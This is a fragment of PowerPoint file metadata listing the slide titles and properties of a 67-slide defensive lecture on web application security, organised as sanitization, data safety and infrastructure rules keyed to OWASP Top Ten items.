      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3183187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WebSe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WebSec</Template>
  <TotalTime>10813</TotalTime>
  <Words>16672</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1123</Paragraphs>
  <Slides>67</Slides>
  <Notes>66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67</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="70" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>WebSec</vt:lpstr>
      <vt:lpstr>Web Application Security</vt:lpstr>
      <vt:lpstr>Changing Face of Attacks - 1</vt:lpstr>
      <vt:lpstr>Changing Face of Attacks - 2</vt:lpstr>
      <vt:lpstr>Changing Face of Attacks - 3</vt:lpstr>
      <vt:lpstr>Top Vulnerabilities</vt:lpstr>
      <vt:lpstr>Where to Start?</vt:lpstr>
      <vt:lpstr>Data Validation/Sanitization (“Top Ten” items A1, A3, A8)</vt:lpstr>
      <vt:lpstr>Sanitization Rule #1</vt:lpstr>
      <vt:lpstr>Sanitization Rule #1 (cont’d)</vt:lpstr>
      <vt:lpstr>Sanitization Rule #1 (cont’d)</vt:lpstr>
      <vt:lpstr>Sanitization Rule #1 (cont’d)</vt:lpstr>
      <vt:lpstr>Sanitization Rule #2</vt:lpstr>
      <vt:lpstr>Sanitization Rule #2 (cont’d)</vt:lpstr>
      <vt:lpstr>Sanitization Rule #2 (cont’d)</vt:lpstr>
      <vt:lpstr>Sanitization Rule #3</vt:lpstr>
      <vt:lpstr>Sanitization Rule #4</vt:lpstr>
      <vt:lpstr>Data Safety</vt:lpstr>
      <vt:lpstr>Safety Rule #1  (A4,A1,A6,A2)</vt:lpstr>
      <vt:lpstr>Safety Rule #2 (A6)</vt:lpstr>
      <vt:lpstr>Safety Rule #3</vt:lpstr>
      <vt:lpstr>Safety Rule #4 (A2,A6)</vt:lpstr>
      <vt:lpstr>Safety Rule #5 (A2)</vt:lpstr>
      <vt:lpstr>Safety Rule #6 (A2)</vt:lpstr>
      <vt:lpstr>Safety Rule #7 (A2)</vt:lpstr>
      <vt:lpstr>Safety Rule #7 (cont’d)</vt:lpstr>
      <vt:lpstr>Safety Rule #7 (cont’d)</vt:lpstr>
      <vt:lpstr>Safety Rule #8 (A4)</vt:lpstr>
      <vt:lpstr>Safety Rule #9 (A2)</vt:lpstr>
      <vt:lpstr>Safety Rule #9 (cont’d)</vt:lpstr>
      <vt:lpstr>Safety Rule #9 (cont’d)</vt:lpstr>
      <vt:lpstr>Safety Rule #9 (cont’d)</vt:lpstr>
      <vt:lpstr>Safety Rule #9 (Cont’d)</vt:lpstr>
      <vt:lpstr>Safety Rule #10</vt:lpstr>
      <vt:lpstr>Safety Rule #10 (Cont’d)</vt:lpstr>
      <vt:lpstr>Safety Rule #11 (A1)</vt:lpstr>
      <vt:lpstr>Safety Rule #11 (cont’d)</vt:lpstr>
      <vt:lpstr>Safety Rule #12 (A6) </vt:lpstr>
      <vt:lpstr>Safety Rule #13 (A10)</vt:lpstr>
      <vt:lpstr>Safety Rule #14</vt:lpstr>
      <vt:lpstr>Safety Rule #15</vt:lpstr>
      <vt:lpstr>Safety Rule #16</vt:lpstr>
      <vt:lpstr>Safety Rule #17</vt:lpstr>
      <vt:lpstr>Safety Rule #18</vt:lpstr>
      <vt:lpstr>Infrastructure Security</vt:lpstr>
      <vt:lpstr>Infrastructure Rule #1  (A9++) </vt:lpstr>
      <vt:lpstr>Infrastructure Rule #2 (A5,A6) </vt:lpstr>
      <vt:lpstr>Infrastructure Rule #2  (cont’d)</vt:lpstr>
      <vt:lpstr>Infrastructure Rule #3 (A5) </vt:lpstr>
      <vt:lpstr>Infrastructure Rule #4 (Ax++) </vt:lpstr>
      <vt:lpstr>Infrastructure Rule #5 (A5++)</vt:lpstr>
      <vt:lpstr>Infrastructure Rule #6 (A5)</vt:lpstr>
      <vt:lpstr>Infrastructure Rule #7 (A5,A6)</vt:lpstr>
      <vt:lpstr>Infrastructure Rule #8 (A4)</vt:lpstr>
      <vt:lpstr>Infrastructure Rule #9 (A6,A5)</vt:lpstr>
      <vt:lpstr>Infrastructure Rule #10 (A7)</vt:lpstr>
      <vt:lpstr>Infrastructure Rule #11 </vt:lpstr>
      <vt:lpstr>Infrastructure Rule #12 </vt:lpstr>
      <vt:lpstr>Infrastructure Rule #13</vt:lpstr>
      <vt:lpstr>Infrastructure Rule #14</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary (cont’d)</vt:lpstr>
      <vt:lpstr>Summary (cont’d)</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References (cont’d)</vt:lpstr>
      <vt:lpstr>References (cont’d)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 Security</dc:title>
  <dc:creator>Holton, Steve</dc:creator>
  <cp:lastModifiedBy>Holton, Steve</cp:lastModifiedBy>
  <cp:revision>441</cp:revision>
  <cp:lastPrinted>2014-07-28T20:41:34Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-07-22T15:17:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-31T17:16:32Z</dcterms:modified>
</cp:coreProperties>
</file>